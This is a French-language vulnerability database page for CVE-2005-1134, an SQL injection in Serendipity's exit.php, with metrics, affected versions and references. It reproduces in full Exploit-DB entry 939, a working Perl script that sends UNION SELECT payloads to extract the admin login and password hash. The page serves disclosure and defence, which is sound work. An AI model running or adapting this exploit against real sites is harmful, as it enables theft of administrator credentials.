CVE-2005-1134 : Détail

CVE-2005-1134

1.72%V3
Network
2005-04-16
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in exit.php for Serendipity 0.8 and earlier allows remote attackers to execute arbitrary SQL commands via the (1) url_id or (2) entry_id parameters.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 939

Date de publication : 2005-04-12 22h00 +00:00
Auteur : kre0n
EDB Vérifié : Yes

#!/usr/bin/perl # Serendipity 0.8beta4 exit.php SQL Injection exploit # (c) ADZ Security Team 2004-2005 # (c) kreon 2005 # http://adz.void.ru/ # [email protected] # Public :) print "\n\n"; print "# Serendipity 0.8beta4 exit.php SQL Injection exploit\n"; print "# (C) ADZ Security Team 2004-2005\n"; print "# (C) kreon 2005\n"; use IO::Socket; use Getopt::Std; getopt("h:d:p:t:"); $opt_p ||= 80; $opt_d ||= "/"; $opt_t ||= "serendipity_"; if(!$opt_h) { die("# Usage: $0 -h <host> [-d <dir>] [-p <port>] [-t table_prefix]\n"); } $sqlpass = "?entry_id=1&url_id=1%20UNION%20SELECT%20password%20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*"; $sqllogin = "?entry_id=1&url_id=1%20UNION%20SELECT%20username%20FROM%20".$opt_t."authors%20WHERE%20userlevel=255/*"; print "# Host: $opt_h\n"; print "# Dir: $opt_d\n"; print "# Port: $opt_p\n"; print "# Prefix: $opt_t\n"; $Q1 = "GET ".$opt_d."/exit.php".$sqllogin." HTTP/1.0\n"; $Q1 .= "Host: ".$opt_h."\n\n"; $Q2 = "GET ".$opt_d."/exit.php".$sqlpass." HTTP/1.0\n"; $Q2 .= "Host: ".$opt_h."\n\n"; $s = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!"); $s->send($Q1); $s->recv($txt, 1024); if($txt =~ m/location: (\S+)/i) { $login = $1; } $s = IO::Socket::INET->new(Proto=>'tcp', PeerAddr => $opt_h, PeerPort => $opt_p) or die("Can't connect!"); $s->send($Q2); $s->recv($txt, 1024); if($txt =~ m/location: (\S+)/i) { $pass = $1; } if(!$login || !$pass || $login =~ m/http:\/\//i || $pass =~ m/http:\/\//i) { print "# Failed :(\n"; exit; } print "# Succeed :)\n"; print "# Login: $login\n"; print "# Pass Hash: $pass\n"; print "\n"; # milw0rm.com [2005-04-13]

Products Mentioned

Configuraton 0

S9y>>Serendipity >> Version 0.3

S9y>>Serendipity >> Version 0.4

S9y>>Serendipity >> Version 0.5

    S9y>>Serendipity >> Version 0.5_pl1

      S9y>>Serendipity >> Version 0.6

        S9y>>Serendipity >> Version 0.6_pl1

          S9y>>Serendipity >> Version 0.6_pl2

            S9y>>Serendipity >> Version 0.6_pl3

              S9y>>Serendipity >> Version 0.6_rc1

                S9y>>Serendipity >> Version 0.6_rc2

                  S9y>>Serendipity >> Version 0.7

                  S9y>>Serendipity >> Version 0.7_beta1

                    S9y>>Serendipity >> Version 0.7_beta2

                      S9y>>Serendipity >> Version 0.7_beta3

                        S9y>>Serendipity >> Version 0.7_beta4

                          S9y>>Serendipity >> Version 0.7_rc1

                            S9y>>Serendipity >> Version 0.8_beta5

                              S9y>>Serendipity >> Version 0.8_beta6

                                Références

                                http://www.s9y.org/5.html
                                Tags : x_refsource_CONFIRM
                                http://www.osvdb.org/15542
                                Tags : vdb-entry, x_refsource_OSVDB
                                http://seclists.org/lists/bugtraq/2005/Apr/0195.html
                                Tags : mailing-list, x_refsource_BUGTRAQ
                                http://secunia.com/advisories/15145
                                Tags : third-party-advisory, x_refsource_SECUNIA
                                http://www.s9y.org/63.html#A9
                                Tags : x_refsource_CONFIRM
                                http://securitytracker.com/id?1013699
                                Tags : vdb-entry, x_refsource_SECTRACK
                                http://www.securityfocus.com/bid/13161
                                Tags : vdb-entry, x_refsource_BID